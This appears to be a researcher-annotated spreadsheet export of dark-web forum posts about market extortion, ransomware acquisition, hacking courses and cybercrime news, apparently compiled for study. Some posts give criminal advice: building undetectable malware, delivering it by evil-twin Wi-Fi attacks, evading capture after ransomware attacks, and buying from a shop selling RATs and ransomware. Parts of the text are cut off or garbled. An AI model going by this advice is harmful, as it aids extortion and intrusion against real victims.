moved up in permissions to support level i would believe you more.;;but you didn't. which makes me say you are bullshitting, trying to extort the market, and was a support member only making fud. prove me wrong by leaking the source code of the market or the database.;if you can do that, well then in your words that "asap completely compromised" would be true. otherwise i'm calling chicken and bullshit as will be marking this as fud.;;;;paris soon made a post regarding the fud &amp; false claims of his post stating:;;;;a person claims to have hacked a market gaining access to the server ip and the permissions of support area accounts. this is in all likelihood false. a ploy to trick people and make people think that there is a problem with a market.;;there is a problem with the market but it doesn't deal with the security but with the staff. specifically a specific support moderator. look at my comments there for some good break downs about why you shouldn't blindly believe. it's important to know for both market admins and users need to make precautions to protect themselves from these assholes.;;admins, keep it in the family, monitor your fucking staff, record all staff interactions, only show what is needed for their job and nothing more. pay the people keeping your operation alive a fair wage. trust is both bought and earned.;;users, don't ever, ever, ever, ever, ever, send your information in the clear. pgp encrypt always.;you don't know who is watching. just because they are staff doesn't mean you should trust them. be kind but smart. this isn't a normal area of the web. if you get scammed here you got no recourse.;;it's not as easy as you might think. but it's also not that hard. you just got to prepare for the worse.;;;;;two hours later, the admin of asap market;/u/aseanmarket;made a statement accounting the 'hacker':;;dear community,;;with natural growth of the market we have experienced a higher volume in tickets and order disputes. in order to continue to provide good quality service we have hired new support staff member to help us resolve tickets faster. soon after we experienced strong ddos attack, which new member admitted of doing as part of extortion process. extortion process involved demanding access to the server and wallet system which we strongly declined.;;;second request was to include him in percentage of the market (up to 30%) which, again we declined.;no money was paid to the attacker. we strongly encourage everyone else found themselves in extortion process to do the same. in a desperate attempt to extort us, rogue member took numerous screenshots of the basic moderation panel and some information of the buyers threatening to publish it to the public. we do not only actively discourage such behavior, but strongly condemn this pure act of doxing. member also admitted of attacking other markets such as darkfox, versus,;neptune, world, dread and planning on hitting hydra next.;;since member acted deceitfully in order to gain trust and came forward immediately, we acted swiftly and removed his account from accessing moderation panel. no database and ip was leaked nor there is a sign of presence of any rogue files on the server (remote shells, etc.). we are admitting a mistake of hiring unvetted members which we will own. as a token of trust we will be offering coupons of $5(asap5usd) and $10(pm modmail) in total amount of $1000 to the community. also, we are thankful to dread community for standing with us in this moment of crisis and offer personal thank you to;/u/paris;for stepping in.;;;like many times before, he helped us again and exercised his expertise in situation handling.;this is why we will offer rogue member's promised first pay as a donation to dread and it's community in the amount of $2000. as continuing act of pettiness, rogue member is continuing ddos attack against our mirrors. we will continue working hard to make access to our market more stable with time to counter this issue. we proved to be safe platform again and we are looking forward to welcome you as our users.;;-asap administration;;;;;;and so it seems that the 'hacker' who failed to provide any actual proof that would testify his claims, turned out to be a new support member the market hired to handle tickets.;;the ex-member confessed to be the one involved in taking down the market;in an attempt to extort the members demanding access to server, wallet system as well as a 30% share of the profits all of which were declined by the admin, and then he tried to threaten them by creating a dox which included various screenshots of basic support panel and;some information of clients.;;the admin also verified that there were no shell injection, no data breach all of which he claimed to have. his attempts of doxxing and extortion failed inevitably, the admin removed provoked his access which was just a support account.;;;if you like what you read, please consider subscribing to the onion web's subdread for daily articles related to the dark web.;/d/theonionweb;;;;the onion web is a news portal where you can find and read about the latest news, interviews, guides and lot of more interesting resources; all darknet related. join the onion web and let's explore the darknet together.;</t>
  </si>
  <si>
    <t xml:space="preserve">Post describing how a user claimed to gain access to asap market data via a 'server shell injection' after a ddos attack showed vulrabilliities they claimed to exploit. Co-admin paris claimes this to be false </t>
  </si>
  <si>
    <t>Information (provider) / debate</t>
  </si>
  <si>
    <t>/u/Friedrich_Nietzsche</t>
  </si>
  <si>
    <t>13/12/2020 05:58</t>
  </si>
  <si>
    <t>59c4170adcd8eb7542b5</t>
  </si>
  <si>
    <t>ASAP Market's new support member tried to extort admins by DDOS attacks &amp; false Dox</t>
  </si>
  <si>
    <t>{'extortion': 4}</t>
  </si>
  <si>
    <t>dear community,;;with natural growth of the market we have experienced a higher volume in tickets and order disputes. in order to continue to provide good quality service we have hired new support staff member to help us resolve tickets faster. soon after we experienced strong ddos attack, which new member admitted of doing as part of extortion process. extortion process involved demanding access to the server and wallet system which we strongly declined. second request was to include him in percentage of the market (up to 30%) which, again we declined. no money was paid to the attacker. we strongly encourage everyone else found themselves in extortion process to do the same.;;in a desperate attempt to extort us, rogue member took numerous screenshots of the basic moderation panel and some information of the buyers threatening to publish it to the public. we do not only actively discourage such behavior, but strongly condemn this pure act of doxing. member also admitted of attacking other markets such as darkfox, versus, neptune, world, dread and planning on hitting hydra next.;;since member acted deceitfully in order to gain trust and came forward immediately, we acted swiftly and removed his account from accessing moderation panel. no database and ip was leaked nor there is a sign of presence of any rogue files on the server (remote shells, etc.).;;we are admitting a mistake of hiring unvetted members which we will own. as a token of trust we will be offering coupons of $5(asap5usd) and $10(pm modmail) in total amount of $1000 to the community. also, we are thankful to dread community for standing with us in this moment of crisis and offer personal thank you to;/u/paris;for stepping in. like many times before, he helped us again and exercised his expertise in situation handling. this is why we will offer rogue member's promised first pay as a donation to dread and it's community in the amount of $2000.;;as continuing act of pettiness, rogue member is continuing ddos attack against our mirrors. we will continue working hard to make access to our market more stable with time to counter this issue.;;we proved to be safe platform again and we are looking forward to welcome you as our users.;;;asap administration;</t>
  </si>
  <si>
    <t>ASAP Market responding to the above attack, mentioned they did not pay the ransom annd apologised to members</t>
  </si>
  <si>
    <t>/u/Aseanmarket</t>
  </si>
  <si>
    <t>814edffbaa3927d51037</t>
  </si>
  <si>
    <t>ASAP Press Release / Annoucement</t>
  </si>
  <si>
    <t>0 days 23:13:00</t>
  </si>
  <si>
    <t>{'extortion': 3}</t>
  </si>
  <si>
    <t>i am very happy that you are still up and strong!</t>
  </si>
  <si>
    <t>showing gratitude to asap market being stable</t>
  </si>
  <si>
    <t>/u/Battery</t>
  </si>
  <si>
    <t>0 days 00:42:00</t>
  </si>
  <si>
    <t>thumbs up guys. 30% huh ? they were aiming high. nevertheless they can go fuck themselves.</t>
  </si>
  <si>
    <t>0 days 00:05:00</t>
  </si>
  <si>
    <t>im able to arp spoof, dns spoof with sslstripping , and inject the beef js hook. i understand why it works too. i have my social engineering delivery method all i need is good malware, ransomware to be specific. is it better to learn to code your own? or buy it off of a ransomware-as-a-service?</t>
  </si>
  <si>
    <t>individual asking what is the best way to acquire ransomware</t>
  </si>
  <si>
    <t>potential hacker (individual) / education (request)</t>
  </si>
  <si>
    <t>/u/CardingAddict</t>
  </si>
  <si>
    <t>23/07/2021 00:39</t>
  </si>
  <si>
    <t>8075b2f77ce3126f9789</t>
  </si>
  <si>
    <t>Able to hack wifi and perform other attacks, now all i need is the malware, whats the best way to ahold of good fud malware?</t>
  </si>
  <si>
    <t>0 days 16:54:00</t>
  </si>
  <si>
    <t>just so you know those methods are dead and don't realistically work in the field. but as far as malware goes it always works better when you make it yourself but you can buy it from a raas as well it's up to you i wouldn't bet on anything you buy being fud when you buy it so i would make your own so you know it will run pass av when you deploy it</t>
  </si>
  <si>
    <t>individual responding to original post stating best to make ransomware yourself or raas stores</t>
  </si>
  <si>
    <t>/u/Dmz02</t>
  </si>
  <si>
    <t>23/07/2021 04:58</t>
  </si>
  <si>
    <t>0 days 04:19:00</t>
  </si>
  <si>
    <t>damn, good looks. is spearphishing where its at? seems like the big ransomware gangs always use that</t>
  </si>
  <si>
    <t>Individual asking whether spearfishing is a good tactic due to multiple ransomware gangs doing the same</t>
  </si>
  <si>
    <t>23/07/2021 06:28</t>
  </si>
  <si>
    <t>0 days 01:30:00</t>
  </si>
  <si>
    <t>you can do spearphishing but i recommend wifi mitm with evil twin attacks and social engineering and to download your malware check out wifiphisher and you'll see what i mean</t>
  </si>
  <si>
    <t>Answer to the above question</t>
  </si>
  <si>
    <t>23/07/2021 17:33</t>
  </si>
  <si>
    <t>0 days 11:05:00</t>
  </si>
  <si>
    <t>here you can find some main information about our shop. please read them carefully. before you make your first order you should be familiar with all of them.;;official link: http://kw4zlnfhxje7top26u57iosg55i7dzuljjcyswo2clgc3mdliviswwyd.onion/;;about: http://kw4zlnfhxje7top26u57iosg55i7dzuljjcyswo2clgc3mdliviswwyd.onion/about/;faq: http://kw4zlnfhxje7top26u57iosg55i7dzuljjcyswo2clgc3mdliviswwyd.onion/faq/;terms and conditions: http://kw4zlnfhxje7top26u57iosg55i7dzuljjcyswo2clgc3mdliviswwyd.onion/terms-and-conditions/;;owner: krang;administration and support: rocksteady;;official support and communication: http://kw4zlnfhxje7top26u57iosg55i7dzuljjcyswo2clgc3mdliviswwyd.onion/support/;;announcements and updates: http://kw4zlnfhxje7top26u57iosg55i7dzuljjcyswo2clgc3mdliviswwyd.onion/announcements/;;categories:;apps;books;botnets;data leak;databases;docs;dox;educations;emails;gifts;guns;id's;mobile apps;ransomware;rats;scripts;;payment: bitcoin/monero/dash;;we are listed on:;dark eye - http://t7tb43a7gvl6wb7j.onion;darknetlive - http://darkzzx4avcsuofgfez5zq75cqc4mprjvfqywo45dfcaxrwqg6qrlfid.onion;onion.live - https://onion.live/;;we try to be visible everywhere, so that customers can compare the address of the service. to always be on the right page and not a fake trying to scam you.</t>
  </si>
  <si>
    <t>Thread providing information related to a thrift shop, contains links indicating they are ransomware related</t>
  </si>
  <si>
    <t>/u/krang</t>
  </si>
  <si>
    <t>19/04/2020 13:03</t>
  </si>
  <si>
    <t>/d/dts</t>
  </si>
  <si>
    <t>bf92ddc5d21ecf2d61ee</t>
  </si>
  <si>
    <t>About Digital Thrift Shop</t>
  </si>
  <si>
    <t>63 days 04:45:00</t>
  </si>
  <si>
    <t>threads in other sub dreads:;http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/87d9e2d1dea08b1e8f45;http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/5a84efbf56a37622d0c5</t>
  </si>
  <si>
    <t>/u/rocksteady</t>
  </si>
  <si>
    <t>21/06/2020 17:48</t>
  </si>
  <si>
    <t>the question is if the attack succeeds or did not succeed, can the victim know the virus sender?</t>
  </si>
  <si>
    <t>Asking whether a victim of a ransomware attack can find the sender if the attack does/does not succeed</t>
  </si>
  <si>
    <t>/u/micheal</t>
  </si>
  <si>
    <t>ec303590ca1c8054ac92</t>
  </si>
  <si>
    <t>About the ransomware</t>
  </si>
  <si>
    <t>0 days 06:00:00</t>
  </si>
  <si>
    <t>8b9b94a35a45a4e2800c</t>
  </si>
  <si>
    <t>that would thoroughly depend on attackers opsec skills</t>
  </si>
  <si>
    <t>Answering question stating the answer is dependant on the users opsec skills</t>
  </si>
  <si>
    <t>/u/measurehead</t>
  </si>
  <si>
    <t>0 days 00:16:00</t>
  </si>
  <si>
    <t>/d/programming</t>
  </si>
  <si>
    <t>1f9e3e01c32680cc2f41</t>
  </si>
  <si>
    <t>0 days 18:10:00</t>
  </si>
  <si>
    <t>it depends your opsec, it's the first thing to think about before doing anything.</t>
  </si>
  <si>
    <t>/u/Sushi-killer</t>
  </si>
  <si>
    <t>0 days 01:27:00</t>
  </si>
  <si>
    <t>what do you mean if the attacks succeeds or not?;if you're gonna run ransomware there are some requirements to do this.;;about finding out - depends on many things - does the ransomware delete logs, how good is your opsec, how did you deliver the malware etc, etc. like others said if you do it correctly (use tails/whonix) for attack and delete all logs chances of getting caught are minimal.</t>
  </si>
  <si>
    <t>0 days 02:56:00</t>
  </si>
  <si>
    <t>{'ransomware': 2}</t>
  </si>
  <si>
    <t>hello micheal. it all really depends on how the attacker sent the ramsomware the virus and what itty bitty details he has left behind. if the attacker left like for example a name beside it then of course they would know. if the attacker left traces then it could be cracked. if for example i sent you a file with a ramsomware you would know it is me.</t>
  </si>
  <si>
    <t>/u/capobianco</t>
  </si>
  <si>
    <t>0 days 05:07:00</t>
  </si>
  <si>
    <t>it depends on what the actual system logs of the infection, if you do your opsec homework right you're free to go.</t>
  </si>
  <si>
    <t>/u/SkyHash</t>
  </si>
  <si>
    <t>0 days 01:21:00</t>
  </si>
  <si>
    <t>i have no knowledge in this field;the idea is to buy the virus from the market and send via email</t>
  </si>
  <si>
    <t>Original poster stating they have little knowledge of ransomware and planned to by ransomware from the market and use that in an email</t>
  </si>
  <si>
    <t>0 days 07:25:00</t>
  </si>
  <si>
    <t>wouldn't work as emails ban such emails and it would be a bit stupid. unless if you find a 'worm' (a virus that infects and leaks itself to contact users). unless if you somehow find a virus that is dedicated to be sent from gmail.</t>
  </si>
  <si>
    <t>Answering question stating emails would most likely not work due to email security</t>
  </si>
  <si>
    <t>0 days 04:33:00</t>
  </si>
  <si>
    <t>it depends on sender's iq level and experience.;most of normal so called hacker uses github repos of some hacking tools.;best tool is social engineering or in other word common sense.</t>
  </si>
  <si>
    <t>Answering question stating experence is important and disuading them from using github repos</t>
  </si>
  <si>
    <t>/u/HolyGrailMarket</t>
  </si>
  <si>
    <t>0 days 01:05:00</t>
  </si>
  <si>
    <t>-----begin pgp signed message-----;hash: sha512;;happy 2nd anniversary titan-xmpp users;;we have updated our aup (acceptable user policy) to disallow ransomware discussions, selling/linking to ransomware offers or anything related. ransomware is a very de</t>
  </si>
  <si>
    <t>Post stating the aup has been updated to disallow discussing/selling/buying ransomware in public chat rooms</t>
  </si>
  <si>
    <t>/u/titan-xmpp</t>
  </si>
  <si>
    <t>17/05/2021 22:15</t>
  </si>
  <si>
    <t>e5801a973f867a6f772b</t>
  </si>
  <si>
    <t>Acceptable User Policy (AUP) changes - NO RANSOMWARE | 2 Year Anniversary | Bulletproof XMPP/Jabber Service</t>
  </si>
  <si>
    <t>1 days 05:07:00</t>
  </si>
  <si>
    <t>{'ransomware': 4}</t>
  </si>
  <si>
    <t>how can this be policed?</t>
  </si>
  <si>
    <t>Question how this change can be policied</t>
  </si>
  <si>
    <t>/u/dontlaugh</t>
  </si>
  <si>
    <t>18/05/2021 15:55</t>
  </si>
  <si>
    <t>0 days 17:40:00</t>
  </si>
  <si>
    <t>it concerns only public chat rooms. since there aren't any logs and we highly advise to use end-to-end plugins like otr and omemo, it is impossible to enforce this on private chats. however for the safety for everyone involved such actions should be avoided, we don't want one individual to ruin the party for everyone.;;titan-xmpp</t>
  </si>
  <si>
    <t>Original poster clarifying the change is for public chat rooms only as it is impossble to enforce this for private chats</t>
  </si>
  <si>
    <t>18/05/2021 19:13</t>
  </si>
  <si>
    <t>0 days 03:18:00</t>
  </si>
  <si>
    <t>so about a week ago i got some ransomware so i did a complete wipe and brand new keys and updated the keys and password to my account, well my high ass forgot the passphrase to the pgp key and so i can't decrypt my 2fa.;;i have all the info needed to secure the account, old/new password, all order history, my pin, and i have my mnemonic.;;if you can't disable my 2fa can you atleast transfer my order history over to my new account, i don't feel like being selectively scammed for being a "new" customer and then lose the dispute to the terrible dispute system since im a fresh account.;;made a ticket but just got a auto response twice now, and can't even get onto my alt to see the ticket number lol</t>
  </si>
  <si>
    <t>Question regardng account recovery, situation was started by the user buying some ransomware</t>
  </si>
  <si>
    <t>potential hacker (individual) / other</t>
  </si>
  <si>
    <t>/u/BoomerAccHelp</t>
  </si>
  <si>
    <t>18/05/2020 14:33</t>
  </si>
  <si>
    <t>/d/EmpireMarket</t>
  </si>
  <si>
    <t>359e0917c5fe961905d7</t>
  </si>
  <si>
    <t>Account Recovery</t>
  </si>
  <si>
    <t>0 days 08:34:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;taiwanese computer make acer has been subjected to a major ransomware attack, where the hacker group has demanded $50 million in ransom from the pc maker, a report in bleeping computer said. this, according to reports, is the biggest ransomware demands till date.;;according to the bleeping computer report, the attackers may have gained access to the acer���s network via a microsoft vulnerability. the revil hacker group is believed to be behind the acer breach. the same hacker group carried out a ransomware attack on travelex last year. according to bleeping computer, the hacker group has given acer until march 28 to pay the ransom or it will leak the data it claims to have collected.;;acer has not yet acknowledged whether it has been the victim to a ransomware attack, but a spokesperson told the verge in an email that the company ���routinely monitors its it systems and more cyberattacks are well defensed. ���companies like us are are constantly under attacorted recent abnormal situations observed to the relevant law enforcement and data protection authorities in multiple countries,��� the company was quoted by the verge as saying.;;the spokesperson also told the website that no further information could be provided at this time due to the ongoing investigation. the data accessed by the hackers, according to the bleeping computer report includes financial spreadsheets, bank balances, and bank communica</t>
  </si>
  <si>
    <t>news article detailing acer ransomware attack - beleived to be revil</t>
  </si>
  <si>
    <t>25/03/2021 22:48</t>
  </si>
  <si>
    <t>6d9d3dfd9405726cd25d</t>
  </si>
  <si>
    <t>Acer Hit With $50 Million Ransomware Attack; Hackers Get Access to Financials, Bank Information</t>
  </si>
  <si>
    <t>{'revil': 1, 'ransomware': 4}</t>
  </si>
  <si>
    <t>hello everyone,;;this is my second guide in my hacking series for people here to enjoy.;;new hacking course:;act ii - network and mitm attacks;;check it out:;hacktownpagdenbb . onion;;this course will teach you how to attack other people on the same wifi network as you with the intent of compromising them with malware (rat, ransomware, etc.) and causing chaos in cyberspace. arm yourselves with this knowledge and start to make money through infecting others with rats, ransomware, or whatever malware you're able to obtain.;;it's recommended for you to read the act i - opsec and wifi hacking course first before starting this course.;;http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/14dccdd02e6fd99bceb0/#c-be527b20f0431c8fa4;;if you enjoyed this course then please post in this thread kind words or criticism to keep this thread visible for the community so others can enjoy and learn as well.;;if you have any questions, comments, or if you need support from act ii please feel free to post in this thread or email me and i'll answer them when i'm able to.;;hack the planet mother fuckers.;;funshine.</t>
  </si>
  <si>
    <t>Funshine (notable course creator) releasing a hacking course</t>
  </si>
  <si>
    <t>/u/Funshine</t>
  </si>
  <si>
    <t>14/04/2020 20:06</t>
  </si>
  <si>
    <t>4adbf65d1bd11699564a</t>
  </si>
  <si>
    <t>Act II - Hacking Guide - Network and MITM attacks</t>
  </si>
  <si>
    <t>48 days 22:23:00</t>
  </si>
  <si>
    <t>loved act 1, thank you in advance for act 2! tried to check it out just now, but site must be really busy or something.</t>
  </si>
  <si>
    <t>People being grateful for this information/course being provided</t>
  </si>
  <si>
    <t>/u/malaga</t>
  </si>
  <si>
    <t>14/04/2020 22:06</t>
  </si>
  <si>
    <t>0 days 02:00:00</t>
  </si>
  <si>
    <t>ok so 1st of all, hello funshine, and thank you for sharing.;;i've spend the whole afternoon reading your guides. not done yet. it is fucking amazing dude !;this is an unbelievable source. man i'm gonna have to buy my membership asap.;so, again : thanks a lot. i'm a complete noob, and sometimes i get lost in all the things i learn but this is going to keep me fuckin motivated !</t>
  </si>
  <si>
    <t>/u/unseen_queen</t>
  </si>
  <si>
    <t>14/04/2020 22:34</t>
  </si>
  <si>
    <t>0 days 00:28:00</t>
  </si>
  <si>
    <t>i'm glad.;;yes this is meant to focus you into proper information instead of getting overwhelmed with information.;;enjoy</t>
  </si>
  <si>
    <t>original poster describing the purpose of the course (reduce being overwhelmed/confusion)</t>
  </si>
  <si>
    <t>14/04/2020 23:45</t>
  </si>
  <si>
    <t>thank you for this guide. i am well versed in hacking wifi and getting internet for free anywhere, it's useful to me to learn what i can do to the other people on the network i just gained access to.</t>
  </si>
  <si>
    <t>/u/jakebarone</t>
  </si>
  <si>
    <t>15/04/2020 03:23</t>
  </si>
  <si>
    <t>0 days 03:38:00</t>
  </si>
  <si>
    <t>-----begin pgp signed message-----;hash: sha256;;now that i have alphabay's ip address and he was always a jerk to me, should i publicly release it?;-----begin pgp signature-----;;iqizbaebcaadfieend4q0tcntfyxd4qedh0n/jym3psfamim3eyacgkqdh0n/jym;3psrsq//em</t>
  </si>
  <si>
    <t>hacker asking for option on whether information he has gained should be released</t>
  </si>
  <si>
    <t>hacker (individual)</t>
  </si>
  <si>
    <t>/u/nightmaremarket</t>
  </si>
  <si>
    <t>c18092c15dc56300e9d6</t>
  </si>
  <si>
    <t>Alphabay Server IP</t>
  </si>
  <si>
    <t>29 days 08:29:00</t>
  </si>
  <si>
    <t>this you?;;-----begin pgp signed message-----
hash: sha256
did you see what i did to world market?
i'm about to post about alphabay's past. do you want it to be good or bad?
bc1qtdkygalxl55zz0ne2qtfxwlrqu3gwd2rs54ct5
83e9m1ummz7wtgwcp1benyarjh5qqfz6ba6pb3ffux5wmsabyftevjjchnrdf5wkolahvscgdsoh2iratjjvlr6m8orrwcu
-----begin pgp signature-----
iqizbaebcaadfieend4q0tcntfyxd4qedh0n/jym3psfamimvlyacgkqdh0n/jym
3puerg//qa1gvo4n3gf/0fkgr7ecsliyqijsvhf4zfnz61ju//xl/l0wap9rh3tr
d+fjetjr1h2p+japqqoolg3s1lfldjx/35bgpctsemsskubwvoruyocnmz2zk2gj
hrjyqa0yzz7e1oyf/4jilq6jkhrd5wvk49eryjx3pzyoym1h8v2cgurrnag+1rm8
na6pfup04wzpx9wf+jfjnvtc8wlybz6twxkrkklihe896c9bj7jun4uu6hazxkiu
bcbepb/7fx/8ubq8bklpshvlmoqohkti4mmpnye21ottauppixftvs010vzda2dl
q7wff+couubkfkyt1w3kk+ekopesfquvplmaywjbwnqwb8xqu29v0ksct9/dceru
/onnorcsxiiqrrwjl0o01nzwvuh+sxmqcks6kugc72alj5rlwgik+nsh6d+gr0n/
excrmftcv/eyl5m6b8/pxsgu3xxvkemxzv7f2lmohgrz81crljk2kqkt/cisc7ji
ziih4/ghxp2cee92c8gaeiobkl0xcleisfnscf94nbk0ilhz66mnici6fjfq8dz6
7tktopaokdziqvcr3enc0gnyacuiwrbbguetpzuprjsqwdfb66w2pl0bvvci4bzb
p066v2/zabo4+i9nkv6dg28glan5vcm3kxsuwxdjfywiqmr0pgy=
=oruc
-----end pgp signature-----;;oh wait i don't need to wonder that, it's signed by you. this simple extortion message removes your entire credibility and if you think you will get away with it, you won't. this kind of shit causes my whole head to spin. you make my job very easy and hard at the same time. if you wanted to completely undermine what i thought was undeniable proof that's one sure way how to do it.;;it's stupid.</t>
  </si>
  <si>
    <t>moderator (Paris - co-owner of dread) questioning the credabillity of the original poster</t>
  </si>
  <si>
    <t>/u/Paris</t>
  </si>
  <si>
    <t>i don't even know what the fuck to do. i got this information 9 hours ago and i'm just fucking furious. it undermines the entire previous message. there was two reasons i gave credence to an exit scammer. one is that they really had nothing to gain from it other than getting back at their team. two is that they did confirm information we did have which gave a lot of credibility to their claims.;;but this shit. it's undermines all of that. as i said before there is potential that another market admin (who knew about the internal fud) might have been in contact and fabricated the message with them. but without any evidence to support such a claim there was little reason for me to think of the fact more. unless things like this presents itself.;;like what the fuck do i do? this is fucking bullshit. here i'm like "oh that is the easiest ban ever" and now i get this and my confidence is shattered. it's ridiculous.</t>
  </si>
  <si>
    <t>i guess this debunks the myth that it was alphabay behind the original post at least.;;i do however have a theory that the world market post was authored by a different person to these extortion posts. firstly, something about the writing style seems slightly different. and secondly, perhaps most crucially, look at the hash message at the top. the world market post was sha512 yet these later ones are sha256 - why would the same person change this setting? it doesn't make sense. my conclusion - it's almost certain more than one person had access to this account and pgp key. the person who made these extortion attempts simply wanted to take advantage of the impact of another person's post. the original poster seemed to have no issue with alphabay and even tagged desnake, yet the second guy suddenly wants to extort them? it just doesn't add up...</t>
  </si>
  <si>
    <t>user debating the credabillity of the original poster</t>
  </si>
  <si>
    <t>/u/Royston</t>
  </si>
  <si>
    <t>0 days 04:10:00</t>
  </si>
  <si>
    <t>{'extortion': 2}</t>
  </si>
  <si>
    <t>bro darkweb pr ransomware, phishing, carding, maldev, scam , redroom bhot glt kaam hote h. sirf drugs nhi bikti. lol;agar dikat h toh clearweb pr hi raho</t>
  </si>
  <si>
    <t xml:space="preserve">unknown (but mentions ransomware) </t>
  </si>
  <si>
    <t>/u/oddkidout</t>
  </si>
  <si>
    <t>14/04/2021 01:43</t>
  </si>
  <si>
    <t>/d/DarknetMarketsIndia</t>
  </si>
  <si>
    <t>97939aae7b60e3cc4df0</t>
  </si>
  <si>
    <t>Amazon.in (Insider Service)</t>
  </si>
  <si>
    <t>91 days 11:33:00</t>
  </si>
  <si>
    <t>114 days 23:24:00</t>
  </si>
  <si>
    <t>the darknetmarketsindia is a better sub than low lives trying to steal others' money. and going by your logic, you wouldn't have any problem if people were seeking child p*rn either right?</t>
  </si>
  <si>
    <t>a user indicating that those who engage in ransomware are low lives</t>
  </si>
  <si>
    <t>/u/highlyhazard</t>
  </si>
  <si>
    <t>25/04/2021 18:56</t>
  </si>
  <si>
    <t>11 days 17:13:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the recent solarwinds and colonial pipeline hacks were caused by achingly bad security practices. to prevent a real catastrophe, american companies need to revamp their it systems. for some companies, this can be a big hurdle, but the potential alternative makes it well worth the effort. michael abboud is founder and ceo of tetherview, a leading private cloud provider. this is an opinion column. the thoughts expressed are those of the author.;;;source: business insider / msn us;;right now, the people in charge of very important pieces of our national infrastructure are bearing an uncomfortable resemblance to a room full of preschoolers wandering around with sharp, pointy scissors. the solarwinds breach earlier this year, considered the largest in the world to date, is said to have resulted from an intern using an incredibly simple and easily guessable password: "solarwinds123". the hackers didn't have to do any "hacking" to execute their breach. they just walked in the metaphorical front door and sat in the living room for 18 months without anybody knowing they were there.;;meanwhile, the colonial pipeline ransomware incident, which abruptly stoppered the flow of fuel through one of the country's most important arteries, didn't happen because the hackers got access to the systems that actually control the pipeline. instead, the hackers simply targeted the company's business systems, which had wide open connections to the control systems.;;this begs the question: why on earth were traditional business technologies like email or sales tools on the same network as operational technologies like valve controls, temperature sensors, and mixers? as someone who works in cybersecurity, there is no reason for those two worlds to co-mingle, particularly when business systems like email are just one wrong click away from being compromised.;;these two companies, while particularly notable for their blunders, are hardly alone with their cavalier approach to security. a hack of a florida water treatment facility earlier this year can be traced to achingly bad security practices like sharing a single password across all computers for remote access.;;in fact, walk into almost any municipal power authority, water authority, or sewage authority, and the fact that a 10-year-old could likely paralyze half of the systems across the country using very unsophisticated and untrained techniques will probably be greeted with a shrug.;;if you've detected a pattern here, it's that, due to poor security practices, many of these companies are their own worst enemies. companies need to address their own failures to better protect themselves against attacks.;;;minimizing harm;;the weakest link in any network is the users. it doesn't matter how smart they are, how cybersecurity-aware they are, or how well-trained they are. people are still the weakest link and represent the biggest threat to the organization.;;imagine a busy manager rushing from meeting to meeting who gets an email saying "voicemail received" and quickly decides to click on it, unaware that it is a phishing attack trying to steal their login credentials. work is often hectic and chaotic; these things can happen all too easily.;;the only way to fully prevent "the weak link" from causing serious self-harm is to turn off the internet entirely and not allow people to use tools like email - but that's not exactly a practical approach for the 21st century. instead, companies should focus on a few key areas to reduce their it footprint and minimize harm.;;for starters, operational technologies, such as the software that controls a fuel pipeline, and business systems, such as email or marketing software, should be segregated or "siloed."any cross communication between the two should be highly controlled and monitored.;;virtual desktops, which allow users to access multiple systems or desktops at one time without commingling data, help build these silos and ensure that there's no communication with the local network that is not authorized.;;a single sign-on process that incorporates multi-factor authentication, allowing a person to sign in once and access several independent software systems - such as teams, zoom, and outlook - with a single log-in, can dramatically reduce the possibility of a successful breach.;;also, in a world of "bring your own devices," proper mobile device management - for instance, turning on security features to prevent certain employees from using their devices to print documents on their personal computers - can lessen the risk associated with smartphones and tablets. employing best practices for device management should include making sure that only whitelisted devices can access the corporate infrastructure.;;;no more delaying;;these are practical, straightforward recommendations. so, why aren't more organizations following them?;;frankly, because it's harder than it looks. if you're starting from scratch, it's easier to put these measures in place than if you have a lot of legacy it investments to navigate. but even if you're starting with a blank slate, you still need to make sure that everything is properly integrated, configured, and maintained.;;there is no easy button here. many companies will look at what's required to beef up their security and file it under "we'll tackle this another day." additionally, americans tend to have a very short memory, which means that events like solarwinds and colonial pipeline will soon be out of sight and out of mind.;;but that would be exactly the wrong lesson to take from these events. the companies in charge of our nation's infrastructure have tripped and stumbled and gotten a few serious scares. now is the time to take the most aggressive measures to protect their systems before there is a real catastrophe.</t>
  </si>
  <si>
    <t>An article desparaging the responce from the US companies after recent ransomware attacks</t>
  </si>
  <si>
    <t>31/05/2021 18:33</t>
  </si>
  <si>
    <t>b4860de4306483733860</t>
  </si>
  <si>
    <t>American Companies Resemble a Bunch of Preschoolers Running with Pointy Scissors When it Comes to Cybersecurity</t>
  </si>
  <si>
    <t>���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;i went ahead and compiled a list of agencies after us because there's a new one ��� just launched and one more on the way; both about cryctocurrency.;;ms. eun young choi will be the first director of the national cryptocurrency enforcement team (ncet).;;they are after coins like kids at an arcade.;;;justice.gov;;"importantly, the ncet will draw and build upon the established expertise across the criminal division to deter, disrupt, investigate, and prosecute criminal misuse of cryptocurrency, as well as to recover the illicit proceeds of those crimes whenever possible. because cryptocurrency is used in a wide variety of criminal activity, from being the primary demand mechanism for ransomware payments, to money laundering and the operation of illegal or unregistered money services businesses, to being the preferred means of exchange of value on;���dark markets���;for illegal drugs, weapons, malware and other hacking tools, the ncet will foster the development of expertise in cryptocurrency and blockchain technologies across all aspects of the departme";;;;;list of agencies and special taskforces working against us;;national cryptocurrency enforcement team (ncet);;u.s. postal inspection service office of investigations;;u.s. postal inspection service cyber crimes unit;;organized crime drug enforcement task force (ocdetf);;narcotic and economic crimes investigations task force (neci);;national cyber investigative joint task force (ncijtf);;dark market and digital currency crimes (dmdcc) task force;*;;north texas parcel task force;;jcode - joint criminal opioid darknet enforcement;;ncidetf - the northern california 